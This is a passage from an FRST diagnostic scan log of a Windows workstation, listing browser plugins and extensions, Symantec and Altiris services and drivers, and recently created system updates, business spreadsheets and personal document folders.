Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)
Tcpip\Parameters: [DhcpNameServer] 10.33.32.34 10.33.32.190 4.2.2.2

FireFox:
========
FF ProfilePath: C:\Users\boylem1\AppData\Roaming\Mozilla\Firefox\Profiles\omays2dt.default
FF Homepage: hxxp://bbnet.blackbox-vs.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_189.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll (Citrix Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: OpenDownload² - C:\Users\boylem1\AppData\Roaming\Mozilla\Firefox\Profiles\omays2dt.default\Extensions\{210249CE-F888-11DD-B868-4CB456D89593} [2014-10-13]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF
FF Extension: Symantec Vulnerability Protection - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFF [2014-09-26]
FF HKCU\...\Firefox\Extensions: [ocplugin@webex.com] - C:\Program Files (x86)\WebEx\Productivity Tools
FF Extension: WebEx Productivity Tools - C:\Program Files (x86)\WebEx\Productivity Tools [2014-10-16]

Chrome:
=======
CHR Profile: C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-13]
CHR Extension: (Google Docs) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-13]
CHR Extension: (Google Drive) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-13]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-10-16]
CHR Extension: (YouTube) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-13]
CHR Extension: (Google Search) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-13]
CHR Extension: (Google Sheets) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-13]
CHR Extension: (Google Wallet) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-13]
CHR Extension: (Gmail) - C:\Users\boylem1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-13]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 AeXAgentSrvHost; C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe [316024 2014-09-10] (Symantec Corporation)
R2 AeXNSClient; C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe [2983688 2014-09-10] (Symantec Corporation)
R2 Altiris Deployment Agent; C:\Program Files\Altiris\Dagent\dagent.exe [2044416 2013-11-22] (Altiris, Inc.) [File not signed]
S3 AltirisAgentProvider; C:\Program Files\Altiris\Altiris Agent\Agents\WMIProviderAgent\AltirisAgentProvider.exe [634288 2014-09-10] (Symantec Corporation)
S3 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2014-10-13] (Macrovision Europe Ltd.) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-07-19] (Intel Corporation)
R2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-08-11] (Symantec Corporation)
R3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe [2379128 2014-08-11] (Symantec Corporation)
S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe [335216 2014-08-11] (Symantec Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20141003.013\BHDrvx64.sys [1586904 2014-10-13] (Symantec Corporation)
R1 ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys [169048 2014-08-11] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-24] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-24] (Symantec Corporation)
R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20141103.011\IDSvia64.sys [525016 2014-10-24] (Symantec Corporation)
R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTDVHD64.sys [3708776 2012-02-07] (Realtek Semiconductor Corp.)
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141103.034\ENG64.SYS [129752 2014-09-24] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20141103.034\EX64.SYS [2137304 2014-09-24] (Symantec Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS [867032 2014-08-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS [36952 2014-08-11] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys [35432 2014-08-11] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS [493656 2014-08-11] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS [1148120 2014-08-11] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-09-26] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS [225496 2014-08-11] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS [437976 2014-08-11] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [155472 2014-09-26] (Symantec Corporation)
R1 Teefer2; C:\Windows\System32\DRIVERS\Teefer.sys [104472 2014-08-11] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-04 11:26 - 2014-11-04 11:27 - 00023237 _____ () C:\Users\boylem1\Desktop\FRST.txt
2014-11-04 11:26 - 2014-11-04 11:26 - 00000000 ____D () C:\FRST
2014-11-04 11:25 - 2014-11-04 11:26 - 02114560 _____ (Farbar) C:\Users\boylem1\Desktop\FRST64.exe
2014-11-04 09:44 - 2014-11-04 09:44 - 795469984 _____ () C:\Windows\MEMORY.DMP
2014-11-04 09:44 - 2014-11-04 09:44 - 00776352 _____ () C:\Windows\Minidump\110414-31512-01.dmp
2014-11-04 09:44 - 2014-11-04 09:44 - 00000000 ____D () C:\Windows\Minidump
2014-11-03 08:43 - 2014-11-03 10:41 - 00000000 ____D () C:\Users\boylem1\Desktop\Room Color
2014-10-30 11:28 - 2014-10-30 11:28 - 00012790 _____ () C:\Users\boylem1\Desktop\Dallas Cowboy - NEC Consultant list of Attendees.xlsx
2014-10-30 09:47 - 2014-10-30 11:27 - 00012228 _____ () C:\Users\boylem1\Desktop\Orlandos Flt Options.xlsx
2014-10-29 12:38 - 2014-10-29 12:38 - 00067821 _____ () C:\Users\boylem1\Desktop\Selfhelp Maintenance Agmt- One Yr  4-15-14.xlsx
2014-10-29 12:34 - 2014-10-29 12:35 - 00075264 _____ () C:\Users\boylem1\Desktop\Selfhelp SWA Maintenance Agmt.xlsx
2014-10-29 07:57 - 2014-10-29 12:32 - 00105472 _____ () C:\Users\boylem1\Desktop\Selfhelp Maintenance Agmt.xls
2014-10-28 16:06 - 2014-10-28 16:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix
2014-10-28 13:49 - 2014-11-03 08:56 - 00000000 ____D () C:\Users\boylem1\AppData\Local\JabberWerxCPP
2014-10-28 13:49 - 2014-10-28 13:49 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\JabberWerxCPP
2014-10-17 09:26 - 2014-10-17 09:26 - 00189532 ____H () C:\Windows\SysWOW64\mlfcache.dat
2014-10-17 08:22 - 2014-10-17 08:22 - 00001783 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-10-17 08:22 - 2014-10-17 08:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-10-17 08:22 - 2014-10-17 08:22 - 00000000 ____D () C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
2014-10-17 08:22 - 2014-10-17 08:22 - 00000000 ____D () C:\Program Files\iTunes
2014-10-17 08:22 - 2014-10-17 08:22 - 00000000 ____D () C:\Program Files\iPod
2014-10-17 08:22 - 2014-10-17 08:22 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-10-17 02:00 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-17 02:00 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-17 02:00 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-16 12:36 - 2014-10-16 12:36 - 00002093 _____ () C:\Users\Public\Desktop\WebEx One-Click.lnk
2014-10-16 12:36 - 2014-10-16 12:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WebEx
2014-10-16 12:36 - 2014-10-16 12:36 - 00000000 ____D () C:\Program Files (x86)\WebEx
2014-10-16 12:34 - 2014-10-21 09:33 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\webex
2014-10-16 12:33 - 2014-10-16 15:31 - 00000000 ____D () C:\ProgramData\WebEx
2014-10-16 12:33 - 2014-10-16 12:33 - 00000000 ____D () C:\Users\boylem1\AppData\Local\WebEx
2014-10-16 11:09 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 11:09 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-16 11:09 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 11:09 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 11:09 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 11:09 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 11:09 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 11:09 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 11:07 - 2014-09-28 19:55 - 03201536 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 11:07 - 2014-09-20 00:18 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-16 11:07 - 2014-09-20 00:17 - 02236928 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-16 11:07 - 2014-09-20 00:17 - 01407488 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 19280896 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-16 11:07 - 2014-09-20 00:16 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-16 11:07 - 2014-09-20 00:15 - 01508864 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-16 11:07 - 2014-09-20 00:15 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-16 11:07 - 2014-09-20 00:15 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 14368768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 13757952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 02055168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 01762816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 01180672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-16 11:07 - 2014-09-19 22:57 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-16 11:07 - 2014-09-19 22:56 - 01440768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-16 11:07 - 2014-09-19 22:56 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-16 11:07 - 2014-09-19 22:56 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-16 11:07 - 2014-09-19 22:38 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-16 11:07 - 2014-09-19 22:33 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-16 11:07 - 2014-09-19 21:43 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-16 11:07 - 2014-09-19 21:35 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-16 11:05 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-16 11:05 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-10-16 11:05 - 2014-06-23 22:29 - 02565120 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-10-16 11:05 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2014-10-16 11:04 - 2014-08-01 06:53 - 01031168 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-10-16 11:04 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll
2014-10-16 11:04 - 2014-06-26 21:08 - 02777088 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-10-16 11:04 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2014-10-15 16:55 - 2014-10-15 16:55 - 00002068 _____ () C:\Users\boylem1\Desktop\UC700 Desktop.lnk
2014-10-15 16:55 - 2014-10-15 16:55 - 00000000 ____D () C:\Users\boylem1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NEC
2014-10-15 16:55 - 2014-10-15 16:55 - 00000000 ____D () C:\Users\boylem1\AppData\Local\NEC
2014-10-15 10:27 - 2014-10-22 13:18 - 00046080 _____ () C:\Users\boylem1\Desktop\VENDOR ADD FORM ver 1.3 4-09.xls
2014-10-15 09:36 - 2014-10-15 09:36 - 00041205 _____ () C:\Users\boylem1\Desktop\Q2 Plan Fiscal Key Objectives.xlsx
2014-10-15 09:35 - 2014-10-15 09:35 - 00699159 _____ () C:\Users\boylem1\Desktop\Fiscal Plan Key Objectives  Q2 LIV_06_FY2015_Final1.xlsx
2014-10-14 07:27 - 2014-10-14 07:27 - 00000000 ____D () C:\Users\boylem1\Documents\Outlook Files
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ___SD () C:\Users\boylem1\Documents\My Data Sources
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Sony PMB
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\OneNote Notebooks
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Old slid show
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Maria & Carolyn
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\K pic
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Fax
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Cyberlink
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Cruise
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\BDAY
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Bahamas
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Agreements
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Adobe
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\Add-in Express
2014-10-14 07:20 - 2014-10-14 07:20 - 00000000 ____D () C:\Users\boylem1\Documents\ACT
2014-10-14 07:20 - 2013-09-24 09:44 - 00016419 _____ () C:\Users\boylem1\Documents\Philly Quote 9-24-13.xlsx
2014-10-14 07:20 - 2013-09-12 08:49 - 00090112 _____ () C:\Users\boylem1\Documents\Price Work Sheet  Corning Revised Parts Semptember 10th 2013.xls
2014-10-14 07:20 - 2013-05-22 12:54 - 00017616 _____ () C:\Users\boylem1\Documents\Winthrop 15 Phones.xlsx
2014-10-14 07:20 - 2012-09-04 13:30 - 00019803 _____ () C:\Users\boylem1\Documents\Solution Fit Assessment New List LIV-Orlando-Islip 9-4-12.xlsx
2014-10-14 07:20 - 2012-09-04 13:29 - 00019822 _____ () C:\Users\boylem1\Documents\Solution Fit Assessment New List Complete 9-4-12.xlsx
2014-10-14 07:20 - 2012-08-24 10:02 - 00012158 _____ () C:\Users\boylem1\Documents\West MTD Bookings.xlsx
2014-10-14 07:20 - 2012-08-10 10:31 - 00192669 _____ () C:\Users\boylem1\Documents\Rick Gannons Presentation 8-14-12   revs 1.pptx
2014-10-14 07:20 - 2012-06-07 15:43 - 00000000 ____D () C:\Users\boylem1\Documents\My 4shared Sync
2014-10-14 07:20 - 2007-05-25 07:40 - 00001604 _____ () C:\Users\boylem1\Documents\QuickTime Player.lnk
2014-10-14 07:20 - 2006-07-27 14:00 - 00000000 ____D () C:\Users\boylem1\Documents\My eBooks
2014-10-14 07:20 - 2006-06-02 12:23 - 00000615 _____ () C:\Users\boylem1\Documents\WinZip.lnk
2014-10-14 07:20 - 2005-09-26 14:50 - 00000523 _____ () C:\Users\boylem1\Documents\SideACT!.lnk
2014-10-14 07:19 - 2014-11-04 10:10 - 237716480 _____ () C:\Users\boylem1\Documents\Personal Folders New 2 pst.pst
2014-10-14 07:19 - 2014-11-04 10:10 - 1845994496 _____ () C:\Users\boylem1\Documents\Personal Folders New 1 pst.pst
2014-10-14 07:19 - 2014-07-28 13:58 - 00021215 _____ () C:\Users\boylem1\Documents\Copy of Tom Halloran -Individual Sign Card.xlsx
2014-10-14 07:19 - 2014-07-25 15:58 - 00014158 _____ () C:\Users\boylem1\Documents\Black Box Cowboys Invitees  7-23-14.xlsx
2014-10-14 07:19 - 2014-07-23 14:29 - 00014033 _____ () C:\Users\boylem1\Documents\Backup of Black Box Cowboys Invitees  7-23-14.xlk
2014-10-14 07:19 - 2014-07-15 15:32 - 00011564 _____ () C:\Users\boylem1\Documents\Copy of LIV Q1 FY15 - Mike K TEAM.xlsx
2014-10-14 07:19 - 2014-07-10 10:33 - 00010669 _____ () C:\Users\boylem1\Documents\NEC Leads- Gerard.xlsx
2014-10-14 07:19 - 2014-07-08 14:55 - 00016997 _____ () C:\Users\boylem1\Documents\Copy of FINAL -  CONSULTANT LIST  7-8-14.xlsx
2014-10-14 07:19 - 2014-07-08 13:39 - 00016929 _____ () C:\Users\boylem1\Documents\FINAL -  CONSULTANT LIST  7-8-14.xlsx
2014-10-14 07:19 - 2014-07-08 10:10 - 00016500 _____ () C:\Users\boylem1\Documents\Copy of CONSULTANT LIST as of 7-8-14.xlsx
2014-10-14 07:19 - 2014-06-20 09:11 - 00465408 _____ () C:\Users\boylem1\Documents\Operations Org - Rev 5 6 14.vsd
2014-10-14 07:19 - 2014-06-17 15:49 - 00013408 _____ () C:\Users\boylem1\Documents\Long Island  Team Bookings YTD 6-17-14.xlsx
2014-10-14 07:19 - 2013-12-31 13:02 - 00011371 _____ () C:\Users\boylem1\Documents\NEC Dallas Co-Op trip Oct 1-2 2013.xlsx
2014-10-14 07:19 - 2013-11-13 11:57 - 00024535 _____ () C:\Users\boylem1\Documents\OCT bookins.xlsx
2014-10-14 07:19 - 2013-10-24 10:17 - 00021071 _____ () C:\Users\boylem1\Documents\Copy of MAC -Dejana.xlsx
2014-10-14 07:19 - 2013-09-11 15:40 - 00011548 _____ () C:\Users\boylem1\Documents\Bid Approval Form 8-2013.xlsx
2014-10-14 07:19 - 2013-07-12 10:40 - 00559425 _____ () C:\Users\boylem1\Documents\NEC POHSTELECOM PWS 10 05 12.xlsx
2014-10-14 07:19 - 2013-05-22 13:16 - 00040448 _____ () C:\Users\boylem1\Documents\Copy of bookings as of 5-22-13.xls
2014-10-14 07:19 - 2013-05-10 13:03 - 00466944 _____ () C:\Users\boylem1\Documents\Mergers  Acquisitions May 10, 2013.ppt
2014-10-14 07:19 - 2013-05-10 12:10 - 00467456 _____ () C:\Users\boylem1\Documents\Mergers  Acquisitions May 2013.ppt
2014-10-14 07:19 - 2013-05-08 14:40 - 00025237 _____ () C:\Users\boylem1\Documents\April Bookings - May Commits.xlsx
2014-10-14 07:19 - 2013-05-08 11:41 - 00025119 _____ () C:\Users\boylem1\Documents\April spread sheet.xlsx
2014-10-14 07:19 - 2013-04-18 14:54 - 00161792 _____ () C:\Users\boylem1\Documents\Copy of South Jersey Quote -2013.xls
2014-10-14 07:19 - 2013-01-16 08:39 - 00108677 _____ () C:\Users\boylem1\Documents\BBNS-LIV NEW ORG 1-16-12.pptx
2014-10-14 07:19 - 2013-01-07 13:11 - 00016149 _____ () C:\Users\boylem1\Documents\DEC.xlsx
2014-10-14 07:19 - 2012-11-30 09:37 - 00030208 _____ () C:\Users\boylem1\Documents\Copy of Nov  Monthly Spreadsheet - Mid Atlantic.xls
2014-10-14 07:19 - 2012-10-24 12:25 - 02390350 _____ () C:\Users\boylem1\Documents\Black Box Corp. Overview 10-12.pptx
2014-10-14 07:19 - 2012-09-04 13:38 - 00057856 _____ () C:\Users\boylem1\Documents\August Spreadsheet with all regions.xls
2014-10-14 07:19 - 2012-08-29 09:53 - 00010307 _____ () C:\Users\boylem1\Documents\Excell test - with fingers crossed.xlsx
2014-10-14 07:19 - 2012-08-24 09:33 - 00012011 _____ () C:\Users\boylem1\Documents\ADS-Florida - MTD Bookings.xlsx
2014-10-14 07:19 - 2012-08-24 09:32 - 03370944 _____ () C:\Users\boylem1\Documents\Islip MTD Bookings.xlsx
